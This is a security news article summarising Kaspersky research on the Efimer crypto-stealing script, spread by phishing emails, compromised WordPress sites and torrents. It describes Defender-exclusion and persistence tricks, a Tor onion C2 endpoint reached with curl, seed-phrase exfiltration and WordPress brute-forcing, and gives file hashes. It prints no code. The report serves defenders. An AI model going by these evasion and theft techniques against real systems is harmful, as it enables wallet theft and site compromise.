Efimer Malicious Script Spreads via WordPress Sites, Torrents, and Email in Massive Attack Wave

Kaspersky researchers have uncovered a widespread campaign involving the Efimer malicious script, a sophisticated Trojan-dropper primarily aimed at stealing cryptocurrency.

First detected in June 2025, the malware impersonates legal correspondence from major companies, accusing recipients of domain name infringements and attaching malicious archives that deploy the Efimer stealer. ‘

Named after a comment in its decrypted script, Efimer has been active since October 2024, initially propagating through compromised WordPress sites before expanding to email phishing and torrent-based lures.

This multi-vector approach has impacted over 5,000 users globally by July 2025, with Brazil seeing the highest infections at 1,476 cases, followed by India, Spain, Russia, Italy, and Germany.

Background and Initial Discovery

The script’s detection verdicts under Kaspersky products include HEUR:Trojan-Dropper.Script.Efimer, HEUR:Trojan-Banker.Script.Efimer, HEUR:Trojan.Script.Efimer, and HEUR:Trojan-Spy.Script.Efimer.gen, highlighting its roles in dropping payloads, banking theft, generic trojan behavior, and spying.

The email distribution tactic involves phishing messages claiming trademark violations, with no specific domain mentioned, urging victims to open a ZIP attachment like “Demand_984175” (MD5: e337c507a4866169a7394d718bc19df9).

This contains a nested password-protected archive and a deceptive password file using Unicode obfuscation (U+1D5E6 for ‘S’) to evade automated extraction.

Extracting it reveals “Requirement.wsf,” which, upon execution, checks for admin privileges and installs the core Efimer component in C:UsersPubliccontroller.

It adds exclusions to Windows Defender for paths like the controller folder, the script itself, and system processes such as exe and cmd.exe.

Depending on privileges, it either schedules tasks via controller.xml or sets registry autorun keys, then displays a fake error message to mislead users.

Propagation Mechanisms

Efimer functions as a ClipBanker Trojan, monitoring the clipboard to replace cryptocurrency wallet addresses with attackers’ versions for Bitcoin, Ethereum, Monero, Tron, and Solana.

It employs regex patterns to identify and swap addresses, ensuring partial matches (e.g., first two characters for short Bitcoin wallets or last character for bc1q-prefixed ones) to maintain plausibility.

Communication with its command-and-control (C2) server occurs via a Tor proxy downloaded from hardcoded URLs on compromised sites, using curl over localhost:9050 to endpoints like cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion/route.php.

The script pings the C2 every 30 minutes with a GUID (e.g., vs1a-1a2b), receiving commands like EVAL for remote code execution or handling seed phrase exfiltration.

It captures screenshots via PowerShell after detecting mnemonics, saves them temporarily, and uploads via FileToOnion to paths like /recvf.php. Beyond theft, Efimer expands through auxiliary scripts for self-propagation.

One variant, btdlg.js (MD5: 0f5404aa252f28c61b08390d52b7a054), brute-forces WordPress admin credentials using Wikipedia-sourced wordlists, Google/Bing searches for targets, and XML-RPC posts to create test entries.

It manages up to 20 concurrent processes, locking domain objects to avoid redundancy, and reports successes to the C2 with GOOD commands.

Compromised sites host fake movie download posts linking to password-protected torrents, which deliver Efimer disguised as XMPEG players (e.g., xmpeg_player.exe, MD5: 442ab067bf78067f5db5d515897db15c).

Another script, liame.js (MD5: eb54c2ff2f62da5d2295ab96eb8d8843), harvests email addresses from specified domains via HTML parsing for mailto links, de-duplicating and exfiltrating them for spam campaigns.

A variant, assembly.js (MD5: 100620a913f0e0a538b115dbace78589), adds VM detection, wallet scanning in browser extensions, and commands like KILL for self-removal.

An alternative Efimer version from torrents uses ntdlg.js (MD5: 627dc31da795b9ab4b8de8ee58fbf952), extracting Tor as ntdlg.exe and adding Defender exclusions via PowerShell.

According to the report, The malware avoids Task Manager detection using WMI queries and handles seed files for reliable exfiltration.

This infrastructure enables attackers to build botnets for further compromises, emphasizing the need for strong passwords, two-factor authentication, and updated antivirus on WordPress sites, while users should avoid suspicious torrents and verify email senders.

Indicators of Compromise (IOC)

The Ultimate SOC-as-a-Service Pricing Guide for 2025– Download for Free